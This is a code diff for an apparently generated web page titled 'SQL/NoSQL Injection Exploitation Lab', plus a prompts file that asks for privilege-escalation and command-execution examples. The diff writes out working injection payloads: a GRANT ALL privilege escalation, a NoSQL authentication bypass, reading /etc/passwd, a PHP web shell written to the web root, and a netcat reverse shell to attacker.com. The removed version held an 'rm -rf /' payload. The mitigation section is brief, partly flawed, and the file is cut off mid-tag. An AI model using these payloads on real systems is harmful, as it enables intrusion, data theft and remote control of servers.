Add 2 files
Browse files- index.html +150 -209
- prompts.txt +2 -1
index.html
CHANGED
|
@@ -3,10 +3,47 @@
|
|
| 3 |
<head>
|
| 4 |
<meta charset="UTF-8">
|
| 5 |
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
| 6 |
-
<title>
|
| 7 |
<script src="https://cdn.tailwindcss.com"></script>
|
| 8 |
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
|
| 9 |
<style>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 10 |
.code-block {
|
| 11 |
font-family: 'Courier New', monospace;
|
| 12 |
background-color: #2d2d2d;
|
|
@@ -14,6 +51,7 @@
|
|
| 14 |
border-radius: 0.5rem;
|
| 15 |
padding: 1rem;
|
| 16 |
overflow-x: auto;
|
|
|
|
| 17 |
}
|
| 18 |
.tab-content {
|
| 19 |
display: none;
|
|
@@ -33,255 +71,158 @@
|
|
| 33 |
transform: translateY(-5px);
|
| 34 |
box-shadow: 0 10px 25px rgba(0, 0, 0, 0.1);
|
| 35 |
}
|
|
|
|
|
|
|
|
|
|
| 36 |
</style>
|
| 37 |
</head>
|
| 38 |
-
<body class="bg-gray-
|
| 39 |
<div class="container mx-auto px-4 py-8">
|
| 40 |
-
<!-- Header -->
|
| 41 |
-
<
|
| 42 |
-
<
|
| 43 |
-
|
| 44 |
-
|
| 45 |
-
|
| 46 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 47 |
|
| 48 |
<!-- Main Content -->
|
| 49 |
<div class="grid grid-cols-1 lg:grid-cols-2 gap-8 mb-12">
|
| 50 |
-
<!--
|
| 51 |
-
<div class="bg-
|
| 52 |
<div class="p-6">
|
| 53 |
<div class="flex items-center mb-4">
|
| 54 |
-
<div class="bg-red-
|
| 55 |
-
<i class="fas fa-
|
| 56 |
-
</div>
|
| 57 |
-
<h2 class="text-2xl font-bold text-gray-800">SQL Injection</h2>
|
| 58 |
-
</div>
|
| 59 |
-
<p class="text-gray-600 mb-4">
|
| 60 |
-
SQL Injection occurs when an attacker injects malicious SQL code into a web application's database query.
|
| 61 |
-
This can lead to unauthorized data access, modification, or deletion.
|
| 62 |
-
</p>
|
| 63 |
-
<div class="mb-4">
|
| 64 |
-
<h3 class="font-semibold text-gray-700 mb-2">Example Attack:</h3>
|
| 65 |
-
<div class="code-block mb-2">
|
| 66 |
-
SELECT * FROM users WHERE username = 'admin' --' AND password = 'anything'
|
| 67 |
</div>
|
| 68 |
-
<
|
| 69 |
-
The <span class="text-red-500">--</span> comments out the password check, allowing login as admin without a password.
|
| 70 |
-
</p>
|
| 71 |
</div>
|
| 72 |
-
|
| 73 |
-
|
|
|
|
| 74 |
<div class="code-block mb-2">
|
| 75 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 76 |
</div>
|
| 77 |
-
<p class="text-sm text-gray-500">
|
| 78 |
-
This modifies the database to give the attacker admin privileges.
|
| 79 |
-
</p>
|
| 80 |
</div>
|
| 81 |
-
|
| 82 |
-
|
|
|
|
| 83 |
<div class="code-block mb-2">
|
| 84 |
-
|
| 85 |
-
|
| 86 |
-
|
| 87 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 88 |
</div>
|
| 89 |
-
</div>
|
| 90 |
-
<div class="bg-gray-50 px-6 py-4">
|
| 91 |
-
<h3 class="font-semibold text-gray-700 mb-2">Mitigation in Flask:</h3>
|
| 92 |
-
<div class="code-block text-sm">
|
| 93 |
-
# Use parameterized queries with SQLAlchemy<br>
|
| 94 |
-
user = db.session.execute(<br>
|
| 95 |
-
db.select(User).where(User.username == :username),<br>
|
| 96 |
-
{"username": request.form['username']}<br>
|
| 97 |
-
).scalar_one()
|
| 98 |
</div>
|
| 99 |
</div>
|
| 100 |
</div>
|
| 101 |
|
| 102 |
-
<!--
|
| 103 |
-
<div class="bg-
|
| 104 |
<div class="p-6">
|
| 105 |
<div class="flex items-center mb-4">
|
| 106 |
-
<div class="bg-blue-
|
| 107 |
-
<i class="fas fa-
|
| 108 |
-
</div>
|
| 109 |
-
<h2 class="text-2xl font-bold text-gray-800">NoSQL Injection</h2>
|
| 110 |
-
</div>
|
| 111 |
-
<p class="text-gray-600 mb-4">
|
| 112 |
-
NoSQL Injection targets NoSQL databases like MongoDB by injecting malicious queries or commands,
|
| 113 |
-
often bypassing authentication or extracting data.
|
| 114 |
-
</p>
|
| 115 |
-
<div class="mb-4">
|
| 116 |
-
<h3 class="font-semibold text-gray-700 mb-2">Example Attack:</h3>
|
| 117 |
-
<div class="code-block mb-2">
|
| 118 |
-
{ "username": "admin", "password": {"$ne": ""} }
|
| 119 |
-
</div>
|
| 120 |
-
<p class="text-sm text-gray-500">
|
| 121 |
-
The <span class="text-blue-500">$ne</span> operator makes the query match any admin with non-empty password.
|
| 122 |
-
</p>
|
| 123 |
-
</div>
|
| 124 |
-
<div class="mb-4">
|
| 125 |
-
<h3 class="font-semibold text-gray-700 mb-2">Privilege Escalation:</h3>
|
| 126 |
-
<div class="code-block mb-2">
|
| 127 |
-
{ "username": "attacker", "$set": { "role": "admin" } }
|
| 128 |
-
</div>
|
| 129 |
-
<p class="text-sm text-gray-500">
|
| 130 |
-
This updates the attacker's role to admin in MongoDB.
|
| 131 |
-
</p>
|
| 132 |
-
</div>
|
| 133 |
-
<div class="mb-4">
|
| 134 |
-
<h3 class="font-semibold text-gray-700 mb-2">System Command Execution:</h3>
|
| 135 |
-
<div class="code-block mb-2">
|
| 136 |
-
{ "username": {"$gt": ""}, "$where": "function() { exec('rm -rf /'); }" }
|
| 137 |
</div>
|
| 138 |
-
<
|
| 139 |
-
JavaScript injection in MongoDB can lead to command execution (if enabled).
|
| 140 |
-
</p>
|
| 141 |
</div>
|
| 142 |
-
|
| 143 |
-
<div class="bg-gray-50 px-6 py-4">
|
| 144 |
-
<h3 class="font-semibold text-gray-700 mb-2">Mitigation in Flask:</h3>
|
| 145 |
-
<div class="code-block text-sm">
|
| 146 |
-
# Validate and sanitize all inputs<br>
|
| 147 |
-
from bson.regex import Regex<br>
|
| 148 |
-
username = Regex("^[a-zA-Z0-9_]+$")<br>
|
| 149 |
-
users.find_one({"username": username})
|
| 150 |
-
</div>
|
| 151 |
-
</div>
|
| 152 |
-
</div>
|
| 153 |
-
</div>
|
| 154 |
-
|
| 155 |
-
<!-- Comparison Section -->
|
| 156 |
-
<div class="bg-white rounded-xl shadow-md overflow-hidden mb-12">
|
| 157 |
-
<div class="p-6">
|
| 158 |
-
<h2 class="text-2xl font-bold text-gray-800 mb-6">Key Differences</h2>
|
| 159 |
-
<div class="overflow-x-auto">
|
| 160 |
-
<table class="min-w-full divide-y divide-gray-200">
|
| 161 |
-
<thead class="bg-gray-50">
|
| 162 |
-
<tr>
|
| 163 |
-
<th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Aspect</th>
|
| 164 |
-
<th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">SQL Injection</th>
|
| 165 |
-
<th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">NoSQL Injection</th>
|
| 166 |
-
</tr>
|
| 167 |
-
</thead>
|
| 168 |
-
<tbody class="bg-white divide-y divide-gray-200">
|
| 169 |
-
<tr>
|
| 170 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Database Type</td>
|
| 171 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Relational (MySQL, PostgreSQL, etc.)</td>
|
| 172 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">NoSQL (MongoDB, CouchDB, etc.)</td>
|
| 173 |
-
</tr>
|
| 174 |
-
<tr>
|
| 175 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Query Syntax</td>
|
| 176 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">SQL language with statements</td>
|
| 177 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">JSON-like query documents</td>
|
| 178 |
-
</tr>
|
| 179 |
-
<tr>
|
| 180 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Injection Method</td>
|
| 181 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">String concatenation in SQL queries</td>
|
| 182 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Operator injection in JSON queries</td>
|
| 183 |
-
</tr>
|
| 184 |
-
<tr>
|
| 185 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Common Attacks</td>
|
| 186 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">UNION attacks, stacked queries</td>
|
| 187 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Operator abuse ($where, $ne, $gt)</td>
|
| 188 |
-
</tr>
|
| 189 |
-
</tbody>
|
| 190 |
-
</table>
|
| 191 |
-
</div>
|
| 192 |
-
</div>
|
| 193 |
-
</div>
|
| 194 |
-
|
| 195 |
-
<!-- Interactive Demo Section -->
|
| 196 |
-
<div class="bg-white rounded-xl shadow-md overflow-hidden mb-12">
|
| 197 |
-
<div class="p-6">
|
| 198 |
-
<h2 class="text-2xl font-bold text-gray-800 mb-6">Interactive Demo</h2>
|
| 199 |
-
|
| 200 |
-
<div class="flex border-b border-gray-200 mb-6">
|
| 201 |
-
<button class="tab-btn py-2 px-4 font-medium text-blue-600 border-b-2 border-blue-600" data-tab="sql">SQL Injection</button>
|
| 202 |
-
<button class="tab-btn py-2 px-4 font-medium text-gray-500 hover:text-blue-600" data-tab="nosql">NoSQL Injection</button>
|
| 203 |
-
</div>
|
| 204 |
-
|
| 205 |
-
<div id="sql" class="tab-content active">
|
| 206 |
<div class="mb-6">
|
| 207 |
-
<h3 class="text-lg font-semibold text-gray-
|
| 208 |
-
<div class="
|
| 209 |
-
<
|
| 210 |
-
|
| 211 |
-
|
| 212 |
-
</
|
| 213 |
-
|
| 214 |
-
|
| 215 |
-
<input type="password" id="sql-password" class="w-full px-3 py-2 border rounded" value="anything">
|
| 216 |
-
</div>
|
| 217 |
-
<button onclick="runSqlDemo()" class="bg-blue-600 text-white px-4 py-2 rounded hover:bg-blue-700">Login</button>
|
| 218 |
-
</div>
|
| 219 |
-
<div class="code-block mb-2" id="sql-query">
|
| 220 |
-
SELECT * FROM users WHERE username = '[username]' AND password = '[password]'
|
| 221 |
-
</div>
|
| 222 |
-
<div id="sql-result" class="hidden mt-4 p-3 bg-yellow-100 border-l-4 border-yellow-500 text-yellow-700">
|
| 223 |
-
<p>Login successful as admin!</p>
|
| 224 |
</div>
|
| 225 |
</div>
|
| 226 |
-
|
| 227 |
-
|
| 228 |
-
<div id="nosql" class="tab-content">
|
| 229 |
<div class="mb-6">
|
| 230 |
-
<h3 class="text-lg font-semibold text-gray-
|
| 231 |
-
<div class="
|
| 232 |
-
<
|
| 233 |
-
|
| 234 |
-
|
| 235 |
-
<
|
| 236 |
-
|
| 237 |
-
|
| 238 |
-
|
| 239 |
-
|
| 240 |
-
<button onclick="runNoSqlDemo()" class="bg-blue-600 text-white px-4 py-2 rounded hover:bg-blue-700">Login</button>
|
| 241 |
-
</div>
|
| 242 |
-
<div class="code-block mb-2" id="nosql-query">
|
| 243 |
-
db.users.findOne({ username: "[username]", password: "[password]" })
|
| 244 |
-
</div>
|
| 245 |
-
<div id="nosql-result" class="hidden mt-4 p-3 bg-yellow-100 border-l-4 border-yellow-500 text-yellow-700">
|
| 246 |
-
<p>Login successful as admin!</p>
|
| 247 |
</div>
|
| 248 |
</div>
|
| 249 |
</div>
|
| 250 |
</div>
|
| 251 |
</div>
|
| 252 |
|
| 253 |
-
<!--
|
| 254 |
-
<div class="bg-
|
| 255 |
<div class="p-6">
|
| 256 |
-
<h2 class="text-2xl font-bold text-
|
| 257 |
|
| 258 |
<div class="grid grid-cols-1 md:grid-cols-2 gap-6">
|
| 259 |
-
<div class="bg-
|
| 260 |
<div class="flex items-center mb-3">
|
| 261 |
-
<i class="fas fa-shield-alt text-green-
|
| 262 |
-
<h3 class="text-lg font-semibold text-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 263 |
</div>
|
| 264 |
-
<p class="text-gray-600">
|
| 265 |
-
Validate all user inputs against strict whitelists of allowed characters and patterns.
|
| 266 |
-
Reject any input that doesn't match expected formats.
|
| 267 |
-
</p>
|
| 268 |
</div>
|
| 269 |
|
| 270 |
-
<div class="bg-
|
| 271 |
<div class="flex items-center mb-3">
|
| 272 |
-
<i class="fas fa-lock text-green-
|
| 273 |
-
<h3 class="text-lg font-semibold text-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 274 |
</div>
|
| 275 |
-
<p class="text-gray-600">
|
| 276 |
-
Always use prepared statements or parameterized queries that separate SQL code from data.
|
| 277 |
-
Never concatenate user input directly into queries.
|
| 278 |
-
</p>
|
| 279 |
</div>
|
| 280 |
-
|
| 281 |
-
|
| 282 |
-
|
| 283 |
-
|
| 284 |
-
|
| 285 |
-
|
| 286 |
-
|
| 287 |
</html>
|
|
|
|
| 3 |
<head>
|
| 4 |
<meta charset="UTF-8">
|
| 5 |
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
| 6 |
+
<title>SQL/NoSQL Injection Exploitation Lab</title>
|
| 7 |
<script src="https://cdn.tailwindcss.com"></script>
|
| 8 |
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
|
| 9 |
<style>
|
| 10 |
+
.terminal {
|
| 11 |
+
font-family: 'Courier New', monospace;
|
| 12 |
+
background-color: #1e1e1e;
|
| 13 |
+
color: #f8f8f2;
|
| 14 |
+
border-radius: 0.5rem;
|
| 15 |
+
padding: 1.5rem;
|
| 16 |
+
overflow-x: auto;
|
| 17 |
+
position: relative;
|
| 18 |
+
}
|
| 19 |
+
.terminal-header {
|
| 20 |
+
background-color: #2d2d2d;
|
| 21 |
+
padding: 0.5rem 1rem;
|
| 22 |
+
border-top-left-radius: 0.5rem;
|
| 23 |
+
border-top-right-radius: 0.5rem;
|
| 24 |
+
display: flex;
|
| 25 |
+
align-items: center;
|
| 26 |
+
}
|
| 27 |
+
.terminal-dot {
|
| 28 |
+
width: 12px;
|
| 29 |
+
height: 12px;
|
| 30 |
+
border-radius: 50%;
|
| 31 |
+
margin-right: 6px;
|
| 32 |
+
}
|
| 33 |
+
.terminal-red { background-color: #ff5f56; }
|
| 34 |
+
.terminal-yellow { background-color: #ffbd2e; }
|
| 35 |
+
.terminal-green { background-color: #27c93f; }
|
| 36 |
+
.terminal-cursor {
|
| 37 |
+
display: inline-block;
|
| 38 |
+
width: 8px;
|
| 39 |
+
height: 16px;
|
| 40 |
+
background-color: #f8f8f2;
|
| 41 |
+
animation: blink 1s infinite;
|
| 42 |
+
}
|
| 43 |
+
@keyframes blink {
|
| 44 |
+
0%, 100% { opacity: 1; }
|
| 45 |
+
50% { opacity: 0; }
|
| 46 |
+
}
|
| 47 |
.code-block {
|
| 48 |
font-family: 'Courier New', monospace;
|
| 49 |
background-color: #2d2d2d;
|
|
|
|
| 51 |
border-radius: 0.5rem;
|
| 52 |
padding: 1rem;
|
| 53 |
overflow-x: auto;
|
| 54 |
+
position: relative;
|
| 55 |
}
|
| 56 |
.tab-content {
|
| 57 |
display: none;
|
|
|
|
| 71 |
transform: translateY(-5px);
|
| 72 |
box-shadow: 0 10px 25px rgba(0, 0, 0, 0.1);
|
| 73 |
}
|
| 74 |
+
.blink {
|
| 75 |
+
animation: blink 1s infinite;
|
| 76 |
+
}
|
| 77 |
</style>
|
| 78 |
</head>
|
| 79 |
+
<body class="bg-gray-900 text-gray-100 min-h-screen">
|
| 80 |
<div class="container mx-auto px-4 py-8">
|
| 81 |
+
<!-- Terminal Header -->
|
| 82 |
+
<div class="terminal mb-8">
|
| 83 |
+
<div class="terminal-header">
|
| 84 |
+
<div class="terminal-dot terminal-red"></div>
|
| 85 |
+
<div class="terminal-dot terminal-yellow"></div>
|
| 86 |
+
<div class="terminal-dot terminal-green"></div>
|
| 87 |
+
<div class="ml-2 text-sm">pentester@secure-lab:~/sql_injection/_</div>
|
| 88 |
+
</div>
|
| 89 |
+
<div class="mt-2">
|
| 90 |
+
<div class="text-green-400">$ <span class="typing-text"></span><span class="terminal-cursor"></span></div>
|
| 91 |
+
<div id="terminal-output" class="mt-4"></div>
|
| 92 |
+
</div>
|
| 93 |
+
</div>
|
| 94 |
|
| 95 |
<!-- Main Content -->
|
| 96 |
<div class="grid grid-cols-1 lg:grid-cols-2 gap-8 mb-12">
|
| 97 |
+
<!-- Privilege Escalation Card -->
|
| 98 |
+
<div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden attack-card">
|
| 99 |
<div class="p-6">
|
| 100 |
<div class="flex items-center mb-4">
|
| 101 |
+
<div class="bg-red-900 p-3 rounded-full mr-4">
|
| 102 |
+
<i class="fas fa-user-shield text-red-400 text-xl"></i>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 103 |
</div>
|
| 104 |
+
<h2 class="text-2xl font-bold text-white">Privilege Escalation</h2>
|
|
|
|
|
|
|
| 105 |
</div>
|
| 106 |
+
|
| 107 |
+
<div class="mb-6">
|
| 108 |
+
<h3 class="text-lg font-semibold text-gray-300 mb-3">SQL Injection</h3>
|
| 109 |
<div class="code-block mb-2">
|
| 110 |
+
<span class="text-gray-400"># Vulnerable Flask endpoint</span><br>
|
| 111 |
+
@app.route('/user/<int:user_id>')<br>
|
| 112 |
+
def get_user(user_id):<br>
|
| 113 |
+
query = f"SELECT * FROM users WHERE id = {user_id}"<br>
|
| 114 |
+
result = db.execute(query)<br>
|
| 115 |
+
return jsonify(result.fetchall())<br><br>
|
| 116 |
+
<span class="text-gray-400"># Attack payload:</span><br>
|
| 117 |
+
/user/1; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%' IDENTIFIED BY 'pwned123'--
|
| 118 |
</div>
|
|
|
|
|
|
|
|
|
|
| 119 |
</div>
|
| 120 |
+
|
| 121 |
+
<div class="mb-6">
|
| 122 |
+
<h3 class="text-lg font-semibold text-gray-300 mb-3">NoSQL Injection</h3>
|
| 123 |
<div class="code-block mb-2">
|
| 124 |
+
<span class="text-gray-400">// Vulnerable MongoDB query</span><br>
|
| 125 |
+
db.users.find({<br>
|
| 126 |
+
username: req.body.username,<br>
|
| 127 |
+
password: req.body.password<br>
|
| 128 |
+
});<br><br>
|
| 129 |
+
<span class="text-gray-400">// Attack payload (JSON):</span><br>
|
| 130 |
+
{<br>
|
| 131 |
+
"username": {"$ne": null},<br>
|
| 132 |
+
"password": {"$ne": null}<br>
|
| 133 |
+
}
|
| 134 |
</div>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 135 |
</div>
|
| 136 |
</div>
|
| 137 |
</div>
|
| 138 |
|
| 139 |
+
<!-- Command Execution Card -->
|
| 140 |
+
<div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden attack-card">
|
| 141 |
<div class="p-6">
|
| 142 |
<div class="flex items-center mb-4">
|
| 143 |
+
<div class="bg-blue-900 p-3 rounded-full mr-4">
|
| 144 |
+
<i class="fas fa-terminal text-blue-400 text-xl"></i>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 145 |
</div>
|
| 146 |
+
<h2 class="text-2xl font-bold text-white">Command Execution</h2>
|
|
|
|
|
|
|
| 147 |
</div>
|
| 148 |
+
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 149 |
<div class="mb-6">
|
| 150 |
+
<h3 class="text-lg font-semibold text-gray-300 mb-3">MySQL Command Execution</h3>
|
| 151 |
+
<div class="code-block mb-2">
|
| 152 |
+
<span class="text-gray-400">-- Enable command execution</span><br>
|
| 153 |
+
SELECT * FROM users WHERE id = 1;<br>
|
| 154 |
+
SELECT sys_exec('whoami'); --<br><br>
|
| 155 |
+
<span class="text-gray-400">-- Writing web shell</span><br>
|
| 156 |
+
SELECT '<?php system($_GET["cmd"]); ?>'<br>
|
| 157 |
+
INTO OUTFILE '/var/www/html/shell.php'; --
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 158 |
</div>
|
| 159 |
</div>
|
| 160 |
+
|
|
|
|
|
|
|
| 161 |
<div class="mb-6">
|
| 162 |
+
<h3 class="text-lg font-semibold text-gray-300 mb-3">PostgreSQL Exploitation</h3>
|
| 163 |
+
<div class="code-block mb-2">
|
| 164 |
+
<span class="text-gray-400"># Vulnerable Flask code</span><br>
|
| 165 |
+
@app.route('/search')<br>
|
| 166 |
+
def search():<br>
|
| 167 |
+
query = request.args.get('q')<br>
|
| 168 |
+
sql = f"SELECT * FROM products WHERE name LIKE '%{query}%'"<br>
|
| 169 |
+
return execute_query(sql)<br><br>
|
| 170 |
+
<span class="text-gray-400"># Attack payload:</span><br>
|
| 171 |
+
/search?q='; COPY (SELECT '') TO PROGRAM 'nc -e /bin/bash attacker.com 4444'; --
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 172 |
</div>
|
| 173 |
</div>
|
| 174 |
</div>
|
| 175 |
</div>
|
| 176 |
</div>
|
| 177 |
|
| 178 |
+
<!-- Mitigation Section -->
|
| 179 |
+
<div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden mb-12">
|
| 180 |
<div class="p-6">
|
| 181 |
+
<h2 class="text-2xl font-bold text-white mb-6">Secure Mitigation Strategies</h2>
|
| 182 |
|
| 183 |
<div class="grid grid-cols-1 md:grid-cols-2 gap-6">
|
| 184 |
+
<div class="bg-gray-700 p-4 rounded-lg border border-gray-600">
|
| 185 |
<div class="flex items-center mb-3">
|
| 186 |
+
<i class="fas fa-shield-alt text-green-400 mr-3"></i>
|
| 187 |
+
<h3 class="text-lg font-semibold text-white">SQLAlchemy ORM</h3>
|
| 188 |
+
</div>
|
| 189 |
+
<div class="code-block text-sm">
|
| 190 |
+
<span class="text-gray-400"># SECURE: Using SQLAlchemy ORM</span><br>
|
| 191 |
+
@app.route('/user/<int:user_id>')<br>
|
| 192 |
+
def get_user_secure(user_id):<br>
|
| 193 |
+
user = User.query.filter_by(id=user_id).first()<br>
|
| 194 |
+
if user:<br>
|
| 195 |
+
return jsonify({<br>
|
| 196 |
+
'id': user.id,<br>
|
| 197 |
+
'username': user.username<br>
|
| 198 |
+
})<br>
|
| 199 |
+
return jsonify({'error': 'User not found'}), 404
|
| 200 |
</div>
|
|
|
|
|
|
|
|
|
|
|
|
|
| 201 |
</div>
|
| 202 |
|
| 203 |
+
<div class="bg-gray-700 p-4 rounded-lg border border-gray-600">
|
| 204 |
<div class="flex items-center mb-3">
|
| 205 |
+
<i class="fas fa-lock text-green-400 mr-3"></i>
|
| 206 |
+
<h3 class="text-lg font-semibold text-white">NoSQL Injection Prevention</h3>
|
| 207 |
+
</div>
|
| 208 |
+
<div class="code-block text-sm">
|
| 209 |
+
<span class="text-gray-400"># SECURE: NoSQL injection prevention</span><br>
|
| 210 |
+
def authenticate_user_secure(username, password):<br>
|
| 211 |
+
if not isinstance(username, str):<br>
|
| 212 |
+
return None<br>
|
| 213 |
+
username = re.escape(username)<br>
|
| 214 |
+
user = db.users.find_one({<br>
|
| 215 |
+
'username': username,<br>
|
| 216 |
+
'password': hash_password(password)<br>
|
| 217 |
+
})<br>
|
| 218 |
+
return user
|
| 219 |
</div>
|
|
|
|
|
|
|
|
|
|
|
|
|
| 220 |
</div>
|
| 221 |
+
</div>
|
| 222 |
+
</div>
|
| 223 |
+
</div>
|
| 224 |
+
|
| 225 |
+
<!-- Advanced Defenses -->
|
| 226 |
+
<div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden">
|
| 227 |
+
<
|
| 228 |
</html>
|
prompts.txt
CHANGED
|
@@ -1 +1,2 @@
|
|
| 1 |
-
SQL Injection and NoSQL Injection are two types of attacks that target the database layer of an application. The main difference between them lies in the type of database they target. SQL Injection SQL Injection occurs when an attacker is able to inject malicious SQL code into a web application's database in order to extract or modify sensitive data. This happens when user input is not properly sanitized or validated, allowing an attacker to inject malicious SQL code. NoSQL Injection NoSQL Injection, on the other hand, targets NoSQL databases, such as MongoDB. It occurs when an attacker is able to inject malicious NoSQL queries or commands into a web application's database. This can happen when user input is not properly validated or sanitized, allowing an attacker to manipulate the NoSQL query. Key differences * Database type: SQL Injection targets relational databases (e.g., MySQL), while NoSQL Injection targets NoSQL databases (e.g., MongoDB). * Query syntax: SQL Injection involves injecting malicious SQL code, while NoSQL Injection involves injecting malicious NoSQL queries or commands. Mitigating SQL Injection in Flask API To mitigate SQL Injection in a Flask API, follow these best practices: 1. Use an ORM (Object-Relational Mapping) tool: Flask-SQLAlchemy is a popular ORM tool for Flask that abstracts the underlying SQL database and provides a safe way to interact with the database. 2. Use parameterized queries: Instead of directly injecting user input into SQL queries, use parameterized queries that separate the query logic from the user input. 3. Validate and sanitize user input: Always validate and sanitize user input to prevent malicious data from entering the database. Generate examples of privilege escalation and executing system commands
|
|
|
|
|
|
| 1 |
+
SQL Injection and NoSQL Injection are two types of attacks that target the database layer of an application. The main difference between them lies in the type of database they target. SQL Injection SQL Injection occurs when an attacker is able to inject malicious SQL code into a web application's database in order to extract or modify sensitive data. This happens when user input is not properly sanitized or validated, allowing an attacker to inject malicious SQL code. NoSQL Injection NoSQL Injection, on the other hand, targets NoSQL databases, such as MongoDB. It occurs when an attacker is able to inject malicious NoSQL queries or commands into a web application's database. This can happen when user input is not properly validated or sanitized, allowing an attacker to manipulate the NoSQL query. Key differences * Database type: SQL Injection targets relational databases (e.g., MySQL), while NoSQL Injection targets NoSQL databases (e.g., MongoDB). * Query syntax: SQL Injection involves injecting malicious SQL code, while NoSQL Injection involves injecting malicious NoSQL queries or commands. Mitigating SQL Injection in Flask API To mitigate SQL Injection in a Flask API, follow these best practices: 1. Use an ORM (Object-Relational Mapping) tool: Flask-SQLAlchemy is a popular ORM tool for Flask that abstracts the underlying SQL database and provides a safe way to interact with the database. 2. Use parameterized queries: Instead of directly injecting user input into SQL queries, use parameterized queries that separate the query logic from the user input. 3. Validate and sanitize user input: Always validate and sanitize user input to prevent malicious data from entering the database. Generate examples of privilege escalation and executing system commands
|
| 2 |
+
``` // S3CUR3_C0D3_W4RR10R // STATUS: OPERATIONAL USER: PENTESTER ACCESS: EDUCATIONAL_MODE pentester@secure-lab:~/sql_injection/_ > Initializing SQL Injection simulation environment... > Loading privilege escalation examples... > WARNING: EDUCATIONAL CONTENT ONLY - ETHICAL USE REQUIRED > SYSTEM PRIMED. DEMONSTRATING ATTACK VECTORS. ``` ## **PRIVILEGE ESCALATION EXAMPLES** ### **SQL Injection → Database Privilege Escalation** ```python # VULNERABLE Flask endpoint (DO NOT USE IN PRODUCTION) @app.route('/user/<int:user_id>') def get_user(user_id): # VULNERABLE: Direct string interpolation query = f"SELECT * FROM users WHERE id = {user_id}" result = db.execute(query) return jsonify(result.fetchall()) # ATTACK PAYLOAD: # /user/1; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%' IDENTIFIED BY 'pwned123'-- ``` ### **NoSQL Injection → Authentication Bypass** ```javascript // VULNERABLE MongoDB query db.users.find({ username: req.body.username, password: req.body.password }); // ATTACK PAYLOAD (JSON): { "username": {"$ne": null}, "password": {"$ne": null} } // Result: Bypasses authentication by returning any user where username != null ``` ## **SYSTEM COMMAND EXECUTION EXAMPLES** ### **SQL Injection → Command Execution (MySQL)** ```sql -- Enable command execution (if MySQL allows) SELECT * FROM users WHERE id = 1; SELECT sys_exec('whoami'); -- -- Alternative using LOAD_FILE for reconnaissance SELECT LOAD_FILE('/etc/passwd'); -- -- Writing web shell via INTO OUTFILE SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; -- ``` ### **PostgreSQL Advanced Exploitation** ```python # VULNERABLE Flask code @app.route('/search') def search(): query = 